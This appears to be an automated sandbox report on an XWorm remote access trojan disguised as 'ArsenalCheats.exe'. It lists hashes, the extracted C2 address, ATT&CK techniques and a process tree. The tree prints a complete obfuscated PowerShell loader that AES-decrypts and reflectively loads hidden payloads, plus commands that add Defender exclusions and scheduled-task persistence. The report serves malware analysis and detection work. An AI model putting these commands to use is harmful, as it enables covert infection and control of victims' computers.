xworm | 3572560b02c226e084c777096894c054e35f52722fe6dbbc3531d1bb08df9fff

Analysis

max time kernel
149s
max time network
157s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
19/08/2024, 17:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ArsenalCheats.exe
Size

274KB
MD5

3b328fc362a6459ed7b74bb3b0b824f3
SHA1

8b5cf3e0c26109a67a3832eb7b63c0954d266b9b
SHA256

3572560b02c226e084c777096894c054e35f52722fe6dbbc3531d1bb08df9fff
SHA512

3c95ee1e07202c1a3580bc4433eb4c1dcb28b22c710d21a2852b6345b13b358e49df74337aff475b8f9df8bf845b18a48374612b1a278f06dfb4b7382c6025cc
SSDEEP

6144:bB5O/3TQG9zULZNv/KOrZTn5ZPUksUflro+CD0l:bBgn9zmZNv/K4ZT5ZP/sU9rjC4

Score

10^/10

xworm discovery execution persistence rat trojan

Malware Config

Extracted

Family

xworm

Version

5.0

147.185.221.22:11860

Mutex

Wn4BW0u57Ed8grMl

Attributes

Install_directory
%LocalAppData%
install_file
Windows Host Proccess.exe

aes.plain

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral3/memory/4000-77-0x0000000007540000-0x0000000007552000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Blocklisted process makes network request 3 IoCs

flow	pid	Process
25	4000	powershell.exe
36	4000	powershell.exe
57	4000	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
5060	powershell.exe
1192	powershell.exe
4000	powershell.exe
5024	powershell.exe
4588	powershell.exe
3076	powershell.exe
528	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation	ArsenalCheats.exe
Key value queried	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation	WScript.exe

Drops startup file 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Host Proccess.lnk	powershell.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Host Proccess.lnk	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
4200	Windows Host Proccess

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Host Proccess = "C:\\Users\\Admin\\AppData\\Local\\Windows Host Proccess"	powershell.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
24	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 20 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ArsenalCheats.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Windows Host Proccess
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
1268	timeout.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings	powershell.exe

Runs net.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
1328	schtasks.exe

Suspicious behavior: EnumeratesProcesses 18 IoCs

pid	Process
5060	powershell.exe
5060	powershell.exe
1192	powershell.exe
1192	powershell.exe
4000	powershell.exe
4000	powershell.exe
5024	powershell.exe
5024	powershell.exe
5024	powershell.exe
4588	powershell.exe
4588	powershell.exe
3076	powershell.exe
3076	powershell.exe
528	powershell.exe
528	powershell.exe
4000	powershell.exe
4200	Windows Host Proccess
4200	Windows Host Proccess

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	5060	powershell.exe
Token: SeDebugPrivilege	1192	powershell.exe
Token: SeIncreaseQuotaPrivilege	1192	powershell.exe
Token: SeSecurityPrivilege	1192	powershell.exe
Token: SeTakeOwnershipPrivilege	1192	powershell.exe
Token: SeLoadDriverPrivilege	1192	powershell.exe
Token: SeSystemProfilePrivilege	1192	powershell.exe
Token: SeSystemtimePrivilege	1192	powershell.exe
Token: SeProfSingleProcessPrivilege	1192	powershell.exe
Token: SeIncBasePriorityPrivilege	1192	powershell.exe
Token: SeCreatePagefilePrivilege	1192	powershell.exe
Token: SeBackupPrivilege	1192	powershell.exe
Token: SeRestorePrivilege	1192	powershell.exe
Token: SeShutdownPrivilege	1192	powershell.exe
Token: SeDebugPrivilege	1192	powershell.exe
Token: SeSystemEnvironmentPrivilege	1192	powershell.exe
Token: SeRemoteShutdownPrivilege	1192	powershell.exe
Token: SeUndockPrivilege	1192	powershell.exe
Token: SeManageVolumePrivilege	1192	powershell.exe
Token: 33	1192	powershell.exe
Token: 34	1192	powershell.exe
Token: 35	1192	powershell.exe
Token: 36	1192	powershell.exe
Token: SeIncreaseQuotaPrivilege	1192	powershell.exe
Token: SeSecurityPrivilege	1192	powershell.exe
Token: SeTakeOwnershipPrivilege	1192	powershell.exe
Token: SeLoadDriverPrivilege	1192	powershell.exe
Token: SeSystemProfilePrivilege	1192	powershell.exe
Token: SeSystemtimePrivilege	1192	powershell.exe
Token: SeProfSingleProcessPrivilege	1192	powershell.exe
Token: SeIncBasePriorityPrivilege	1192	powershell.exe
Token: SeCreatePagefilePrivilege	1192	powershell.exe
Token: SeBackupPrivilege	1192	powershell.exe
Token: SeRestorePrivilege	1192	powershell.exe
Token: SeShutdownPrivilege	1192	powershell.exe
Token: SeDebugPrivilege	1192	powershell.exe
Token: SeSystemEnvironmentPrivilege	1192	powershell.exe
Token: SeRemoteShutdownPrivilege	1192	powershell.exe
Token: SeUndockPrivilege	1192	powershell.exe
Token: SeManageVolumePrivilege	1192	powershell.exe
Token: 33	1192	powershell.exe
Token: 34	1192	powershell.exe
Token: 35	1192	powershell.exe
Token: 36	1192	powershell.exe
Token: SeIncreaseQuotaPrivilege	1192	powershell.exe
Token: SeSecurityPrivilege	1192	powershell.exe
Token: SeTakeOwnershipPrivilege	1192	powershell.exe
Token: SeLoadDriverPrivilege	1192	powershell.exe
Token: SeSystemProfilePrivilege	1192	powershell.exe
Token: SeSystemtimePrivilege	1192	powershell.exe
Token: SeProfSingleProcessPrivilege	1192	powershell.exe
Token: SeIncBasePriorityPrivilege	1192	powershell.exe
Token: SeCreatePagefilePrivilege	1192	powershell.exe
Token: SeBackupPrivilege	1192	powershell.exe
Token: SeRestorePrivilege	1192	powershell.exe
Token: SeShutdownPrivilege	1192	powershell.exe
Token: SeDebugPrivilege	1192	powershell.exe
Token: SeSystemEnvironmentPrivilege	1192	powershell.exe
Token: SeRemoteShutdownPrivilege	1192	powershell.exe
Token: SeUndockPrivilege	1192	powershell.exe
Token: SeManageVolumePrivilege	1192	powershell.exe
Token: 33	1192	powershell.exe
Token: 34	1192	powershell.exe
Token: 35	1192	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4000	powershell.exe

Suspicious use of WriteProcessMemory 54 IoCs

description	pid	Process	procid_target
PID 4436 wrote to memory of 4516	4436	ArsenalCheats.exe	83
PID 4436 wrote to memory of 4516	4436	ArsenalCheats.exe	83
PID 4436 wrote to memory of 4516	4436	ArsenalCheats.exe	83
PID 4516 wrote to memory of 1008	4516	cmd.exe	85
PID 4516 wrote to memory of 1008	4516	cmd.exe	85
PID 4516 wrote to memory of 1008	4516	cmd.exe	85
PID 1008 wrote to memory of 1096	1008	net.exe	86
PID 1008 wrote to memory of 1096	1008	net.exe	86
PID 1008 wrote to memory of 1096	1008	net.exe	86
PID 4516 wrote to memory of 5060	4516	cmd.exe	90
PID 4516 wrote to memory of 5060	4516	cmd.exe	90
PID 4516 wrote to memory of 5060	4516	cmd.exe	90
PID 5060 wrote to memory of 1192	5060	powershell.exe	91
PID 5060 wrote to memory of 1192	5060	powershell.exe	91
PID 5060 wrote to memory of 1192	5060	powershell.exe	91
PID 5060 wrote to memory of 2788	5060	powershell.exe	98
PID 5060 wrote to memory of 2788	5060	powershell.exe	98
PID 5060 wrote to memory of 2788	5060	powershell.exe	98
PID 2788 wrote to memory of 3504	2788	WScript.exe	99
PID 2788 wrote to memory of 3504	2788	WScript.exe	99
PID 2788 wrote to memory of 3504	2788	WScript.exe	99
PID 3504 wrote to memory of 4960	3504	cmd.exe	101
PID 3504 wrote to memory of 4960	3504	cmd.exe	101
PID 3504 wrote to memory of 4960	3504	cmd.exe	101
PID 4960 wrote to memory of 4976	4960	net.exe	102
PID 4960 wrote to memory of 4976	4960	net.exe	102
PID 4960 wrote to memory of 4976	4960	net.exe	102
PID 3504 wrote to memory of 4000	3504	cmd.exe	103
PID 3504 wrote to memory of 4000	3504	cmd.exe	103
PID 3504 wrote to memory of 4000	3504	cmd.exe	103
PID 4000 wrote to memory of 5024	4000	powershell.exe	107
PID 4000 wrote to memory of 5024	4000	powershell.exe	107
PID 4000 wrote to memory of 5024	4000	powershell.exe	107
PID 4000 wrote to memory of 4588	4000	powershell.exe	109
PID 4000 wrote to memory of 4588	4000	powershell.exe	109
PID 4000 wrote to memory of 4588	4000	powershell.exe	109
PID 4000 wrote to memory of 3076	4000	powershell.exe	111
PID 4000 wrote to memory of 3076	4000	powershell.exe	111
PID 4000 wrote to memory of 3076	4000	powershell.exe	111
PID 4000 wrote to memory of 528	4000	powershell.exe	113
PID 4000 wrote to memory of 528	4000	powershell.exe	113
PID 4000 wrote to memory of 528	4000	powershell.exe	113
PID 4000 wrote to memory of 1328	4000	powershell.exe	115
PID 4000 wrote to memory of 1328	4000	powershell.exe	115
PID 4000 wrote to memory of 1328	4000	powershell.exe	115
PID 4000 wrote to memory of 3712	4000	powershell.exe	133
PID 4000 wrote to memory of 3712	4000	powershell.exe	133
PID 4000 wrote to memory of 3712	4000	powershell.exe	133
PID 4000 wrote to memory of 4324	4000	powershell.exe	135
PID 4000 wrote to memory of 4324	4000	powershell.exe	135
PID 4000 wrote to memory of 4324	4000	powershell.exe	135
PID 4324 wrote to memory of 1268	4324	cmd.exe	137
PID 4324 wrote to memory of 1268	4324	cmd.exe	137
PID 4324 wrote to memory of 1268	4324	cmd.exe	137

C:\Users\Admin\AppData\Local\Temp\ArsenalCheats.exe
"C:\Users\Admin\AppData\Local\Temp\ArsenalCheats.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4436
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\R.bat" "
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4516
- - C:\Windows\SysWOW64\net.exe
    net file
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1008
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 file
      4⤵
      System Location Discovery: System Language Discovery
      PID:1096
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RYW9ggvUaR5JRJ1uessN0UgHvYjbDGgzfWY065YcerM='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uR+Q8GE+5SFn27MTuZRc3A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $yQwop=New-Object System.IO.MemoryStream(,$param_var); $PuPlL=New-Object System.IO.MemoryStream; $zGCDC=New-Object System.IO.Compression.GZipStream($yQwop, [IO.Compression.CompressionMode]::Decompress); $zGCDC.CopyTo($PuPlL); $zGCDC.Dispose(); $yQwop.Dispose(); $PuPlL.Dispose(); $PuPlL.ToArray();}function execute_function($param_var,$param2_var){ $riOXx=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $JQnac=$riOXx.EntryPoint; $JQnac.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\R.bat';$FkZfX=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\R.bat').Split([Environment]::NewLine);foreach ($zjqyf in $FkZfX) { if ($zjqyf.StartsWith(':: ')) { $Zodzv=$zjqyf.Substring(3); break; }}$payloads_var=[string[]]$Zodzv.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:5060
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_17_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_17.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1192
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_17.vbs"
      4⤵
      Checks computer location settings
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2788
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_17.bat" "
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:3504
      - C:\Windows\SysWOW64\net.exe
        
        net file
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:4960
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 file
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:4976
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RYW9ggvUaR5JRJ1uessN0UgHvYjbDGgzfWY065YcerM='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uR+Q8GE+5SFn27MTuZRc3A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $yQwop=New-Object System.IO.MemoryStream(,$param_var); $PuPlL=New-Object System.IO.MemoryStream; $zGCDC=New-Object System.IO.Compression.GZipStream($yQwop, [IO.Compression.CompressionMode]::Decompress); $zGCDC.CopyTo($PuPlL); $zGCDC.Dispose(); $yQwop.Dispose(); $PuPlL.Dispose(); $PuPlL.ToArray();}function execute_function($param_var,$param2_var){ $riOXx=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $JQnac=$riOXx.EntryPoint; $JQnac.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_17.bat';$FkZfX=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_17.bat').Split([Environment]::NewLine);foreach ($zjqyf in $FkZfX) { if ($zjqyf.StartsWith(':: ')) { $Zodzv=$zjqyf.Substring(3); break; }}$payloads_var=[string[]]$Zodzv.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        6⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Drops startup file
        Adds Run key to start application
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:4000
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:5024
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4588
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Windows Host Proccess'
        7⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:3076
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Host Proccess'
        7⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:528
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Host Proccess" /tr "C:\Users\Admin\AppData\Local\Windows Host Proccess"
        7⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:1328
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /delete /f /tn "Windows Host Proccess"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:3712
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpD528.tmp.bat""
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:4324
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        8⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:1268

C:\Users\Admin\AppData\Local\Windows Host Proccess
"C:\Users\Admin\AppData\Local\Windows Host Proccess"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4200

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
9751fcb3d8dc82d33d50eebe53abe314

SHA1
7a680212700a5d9f3ca67c81e0e243834387c20c

SHA256
ad2e3139aa438f799c4a876ca3e64af772b8a5786149925a08389723e42394d7

SHA512
54907cc18684ff892b737496183ca60c788d8f5d76365586954f269dbd50ac1b9cd48c7c50bd6ca02009e6020fd77a8282c9a7ad6b824a20585c505bd7e13709

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
26af0a7a083ed3faba5b4eaa35b0ca95

SHA1
1215bc53890c8620cb6f596f1861c55346a043ef

SHA256
4564499c73afd3c14d7f9dc925071e8e3317a624bd22014e95de70838890e4ab

SHA512
d5c7bc510ee8231ca9622262a5f068f13c8958e10571ad13f9f562772eaf9cd8fae0256e838f84e403a027b8503130e834ac61006a45fc909054baaaee13b7a7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
6871fff69aafb29e5146aa33be0cafca

SHA1
03bee0a1e5ae73b80a19c9478072d156688a2cc8

SHA256
20b9ba457596e14a930210b600ee09cf59f2a58e47e5007d6d76be0920b208a3

SHA512
6992f3b8518faa7015f63d3c88cd59784944765f4de1b6a69634778adce898fc9adca310bcb1762ed808575fc32fe80af18315bf7ca4e14ca80111e1d7e051b7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
a1a7fd0fa465da473a83c78950af75f3

SHA1
d97e9b5fe99cfae72596f4e89fd91a3a21d60e02

SHA256
b68b4cc621cec9c2add4f8122621a9b7be5429f50f6f5fea47dfe0c512ee625c

SHA512
cf4c2a79fc5601d4da41f541870dab9d5044d7a33048330e57a96a1c52bfde20856a26421e85cdd13bd09a75f792a97992883bc7833658f01739575717f6e78c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
20KB

MD5
601c6341f260c9d80043c9ff5a286df1

SHA1
005f847c701228333ba85dc0df4a4f906e783fa9

SHA256
0b32d08c15673251cba483ee4955c9967f33869109de56da750bf0b2dee79acc

SHA512
7fc2a0ab078147db77dbf461a30b8e1ed83c6a447b31cd89049acb5b8e07566b4b12a74f66c2a33df1406e13bea5c7b670f2fd47a516f65b7a289310429297a0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
c317d5369a3b93f1c734ba44d2c8776f

SHA1
ef8845ed946e61e698974388c805a117a47c822b

SHA256
6f8226e06f39b414864a8dfb04d245e9911bf89cfb704db729497d72cd2023b1

SHA512
23cf6f7130c7a14de586a14894a02333e9128007427734d580f8376cd5b4c8736faf8c2a11a92e2035ff2f91f3f99fcf65a8e3f5a81bfadb60d41484cec0cc32

Download Submit
C:\Users\Admin\AppData\Local\Temp\R.bat

Filesize
270KB

MD5
b351e6715948f802c19611db86cc19ea

SHA1
a8bc001dc8c2e29d78579b7b1acb57be7e4e7f22

SHA256
e2ac8e1289dcd0c61d7bf98688a93bb2031b9fbc796053f965e1d8d311d2ede3

SHA512
07faa4232fca72d8158424d9e220229d0b072c6481f20cead89a07342b3d7037af7d302da23a726df9f90dfe6fad67c2a37f2a909a84852625e549c569a8a2cd

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gwpwgymf.rth.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpD528.tmp.bat

Filesize
171B

MD5
36f20a74f4eb4046b811ed9a2bf3cda9

SHA1
3320aade94b4c6af23f5b7c2691b8a8ffd1a515c

SHA256
783e7c73b15baf9f462ef63bc0eb5f7839da6918d2d6ee5a8eb068c915ade0ea

SHA512
a4f6a1ae38cc3b00954600f384279a27be5a0b0d55610e6b4d0e18480a0565cb99f3c00fe68f265fb9e9142d02f46e3584b6ce8459e2019e1178e41b21de0c71

Download Submit
C:\Users\Admin\AppData\Local\Windows Host Proccess

Filesize
423KB

MD5
c32ca4acfcc635ec1ea6ed8a34df5fac

SHA1
f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

SHA256
73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

SHA512
6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_17.vbs

Filesize
114B

MD5
864ddb855adfdeb78a21b7316789a85c

SHA1
2b527528b35a68946709fe83a9db5dfda0567893

SHA256
3886c008a9bcfd922c0f1b7494b2bb14651d5f66b8dd9df844ea2d69b81eba38

SHA512
b0ba8ddceed874331f2d4b437b10b75141080067a78058a51e9e1c1ed19990beaa5e8bc4d57af09be668fc33e55c433e7787badd13d1d7715666c8e41d2a0612

Download Submit
memory/528-157-0x0000000071060000-0x00000000710AC000-memory.dmp

Filesize
304KB

Download
memory/1192-53-0x0000000007B90000-0x0000000007C26000-memory.dmp

Filesize
600KB

Download
memory/1192-54-0x0000000007B10000-0x0000000007B21000-memory.dmp

Filesize
68KB

Download
memory/1192-39-0x0000000007760000-0x0000000007792000-memory.dmp

Filesize
200KB

Download
memory/1192-52-0x0000000007980000-0x000000000798A000-memory.dmp

Filesize
40KB

Download
memory/1192-51-0x00000000077B0000-0x0000000007853000-memory.dmp

Filesize
652KB

Download
memory/1192-50-0x0000000007740000-0x000000000775E000-memory.dmp

Filesize
120KB

Download
memory/1192-40-0x0000000071060000-0x00000000710AC000-memory.dmp

Filesize
304KB

Download
